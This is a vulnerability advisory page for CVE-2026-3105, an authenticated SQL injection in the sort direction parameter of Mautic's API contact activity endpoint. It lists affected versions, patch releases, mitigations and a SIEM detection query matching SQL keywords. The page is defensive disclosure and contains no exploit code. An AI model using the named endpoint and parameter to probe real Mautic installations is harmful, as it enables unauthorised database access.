Login Sign Up

CVE-2026-3105

7.6 HIGH
SQL Injection

📋 TL;DR

This SQL injection vulnerability in Mautic's API endpoint allows authenticated users to inject arbitrary SQL commands via the sort direction parameter. Attackers could potentially read, modify, or delete database contents. Only authenticated users can exploit this vulnerability.

💻 Affected Systems

Products:
  • Mautic
Versions: Versions before 4.4.19, 5.2.10, 6.0.8, and 7.0.1
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated access to the API endpoint

📦 What is this software?

Mautic by Acquia

View all CVEs affecting Mautic →

Mautic by Acquia

View all CVEs affecting Mautic →

Mautic by Acquia

View all CVEs affecting Mautic →

Mautic by Acquia

View all CVEs affecting Mautic →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete database compromise including data exfiltration, data manipulation, or deletion of critical information

🟠

Likely Case

Unauthorized data access and potential privilege escalation through database manipulation

🟢

If Mitigated

Limited impact with proper input validation and parameterized queries in place

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access and knowledge of SQL injection techniques

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.4.19, 5.2.10, 6.0.8, 7.0.1 or later

Vendor Advisory: https://github.com/mautic/mautic/security/advisories/GHSA-r5j5-q42h-fc93

Restart Required: Yes

Instructions:

1. Backup your Mautic installation and database. 2. Update to the patched version using your preferred method (composer, manual download, etc.). 3. Restart your web server. 4. Verify the update was successful.

🔧 Temporary Workarounds

No official workarounds

all

The vendor has stated there are no workarounds available

🧯 If You Can't Patch

  • Implement strict input validation for the sort direction parameter
  • Apply web application firewall rules to block SQL injection patterns

🔍 How to Verify

Check if Vulnerable:

Check your Mautic version against affected versions. If using version before 4.4.19, 5.2.10, 6.0.8, or 7.0.1, you are vulnerable.

Check Version:

Check the Mautic admin dashboard or examine the app/AppKernel.php file for version information

Verify Fix Applied:

Verify your Mautic version is 4.4.19, 5.2.10, 6.0.8, 7.0.1 or later

📡 Detection & Monitoring

Log Indicators:

  • Unusual SQL queries in database logs
  • Multiple failed login attempts followed by API calls
  • API requests with unusual sort parameters

Network Indicators:

  • Unusual patterns in API requests to contact activity endpoints
  • Requests containing SQL keywords in sort parameters

SIEM Query:

source="web_server" AND (uri="*api/contacts/*/activity*" OR uri="*api/contact/*/activity*") AND (query="*ORDER BY*" OR query="*UNION*" OR query="*SELECT*" OR query="*INSERT*")

📊 Metadata

CVE ID: CVE-2026-3105
CVSS v3 Score: 7.6 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
CWE: CWE-89
Published: February 24, 2026
Last Updated: February 27, 2026

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2026-3105, you might also want to check these:

CVE-2024-8522 10.0

This vulnerability allows unauthenticated attackers to perform SQL injection attacks on WordPress si...

Same vulnerability type (CWE-89)
CVE-2024-13152 10.0

This SQL injection vulnerability in BSS Software's Mobuy Online Machinery Monitoring Panel allows at...

Same vulnerability type (CWE-89)
CVE-2021-42311 10.0

CVE-2021-42311 is a critical SQL injection vulnerability in Microsoft Defender for IoT that allows r...

Same vulnerability type (CWE-89)